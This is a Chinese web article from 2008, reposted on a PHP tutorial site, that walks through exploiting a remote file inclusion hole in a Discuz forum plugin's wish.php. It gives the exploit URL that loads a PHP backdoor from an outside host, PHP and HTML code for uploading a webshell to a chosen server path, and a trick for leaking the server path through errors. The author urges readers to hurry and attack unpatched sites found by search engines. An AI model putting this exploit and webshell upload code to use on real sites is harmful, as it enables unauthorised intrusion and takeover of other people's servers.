下一篇 » « 上一篇

Discuz插件漏洞攻击

作者:    时间:2008-01-22    来源:    点击:31008    本文共1篇文章 字体:[ ]

Discuz插件漏洞攻击

PS:话说光这个漏洞《黑客X档案》都说了N遍,呵呵........
既然有人公布了,也有人连利用程序都写好了,那我也就公布吧!消息来源是鬼仔告诉我的,好像是火狐哪个大哥发现的洞,不太清楚了!
  discuz论坛的许愿池插件在DZ根目录有个wish.php文件,文件第四行: 本文来自 www.444p.com

require $discuz_root.'./include/discuzcode.func.php';

www.444p.com

很明显程序没有做任何过滤,一个十足的远程包含漏洞,具体利用方法就很简单了:


http://www.163.com/wish.php?discuz_root=http://www.flyt.cn/xxxx.txt?

别忘了后面有个问号!xxxx.txt就是我的PHP木马,c99shell不知道为什么,我没成功,也许与操作系统有关,我没仔细去实验了,直接用的安全天使的那PHP后门,不过可以得到一个"webshell",但是用安全天使那PHP后门无法上传我们真正的webshell上去,所以用下面这个文件就可以上传你的WEBSHELL到网站目录,

www.444p.com

<?copy($_FILES[MyFile][tmp_name],"C:\Inetpub\vhosts\baidu.com\bbs\cntink.php");?> www.444p.com

<form ENCTYPE="multipart/form-data" ACTION="" METHOD="POST">

本文来自 www.444p.com

<input NAME="MyFile" TYPE="file"> www.444p.com版权所有

<input VALUE=" 提交 " TYPE="submit">

php学习之家http://www.444p.com

</form>

本文来自 www.444p.com

怎么得到网站实际路径呢?很简单,直接打开http://www.163.com/wish.php?discuz_root=http://www.flyt.cn/xxxx.txt ,不要最后那个问号,这时你会发现程序报错了,网站的实际路径也就出来了!修改个文件里的

www.444p.com php学习之家

C:\Inetpub\vhosts\baidu.com\bbs\
为当前你要黑的这个网站实际路径;cntink.php是你上传webshell后需要保存的名字,随便你取什么!
  把上面那文件保存为txt(其他扩展名也可以)上传到你自己的网站,比如我取名为fly.txt,现在再打开 www.444p.com php学习之家

http://www.163.com/wish.php?discuz_root=http://www.flyt.cn/fly.txt?
OK...看见上传对话框了吧,慢慢上传你的webshell吧!上传后的路径就是你在fly.txt中所设置的路径!
  以上文章纯属乱写,谁利用这方法黑了站遇到麻烦别找我....其实这玩意应该是发布补丁后才能公开的,但又不是官方的插件,而且别人都发了,无所谓了! php学习之家

PS:要行动的快点,引用群里某X的一句话: baidu google都把discuz inurl:wish.php搜完了 不过漏洞没补

  php学习之家http://www.444p.com

责任编辑:semirock
发表评论
密码: (游客不需要密码)
记住我【Alt+S 或 Ctrl+Enter 快速提交】

搜索工具


《PHP教程》点击排行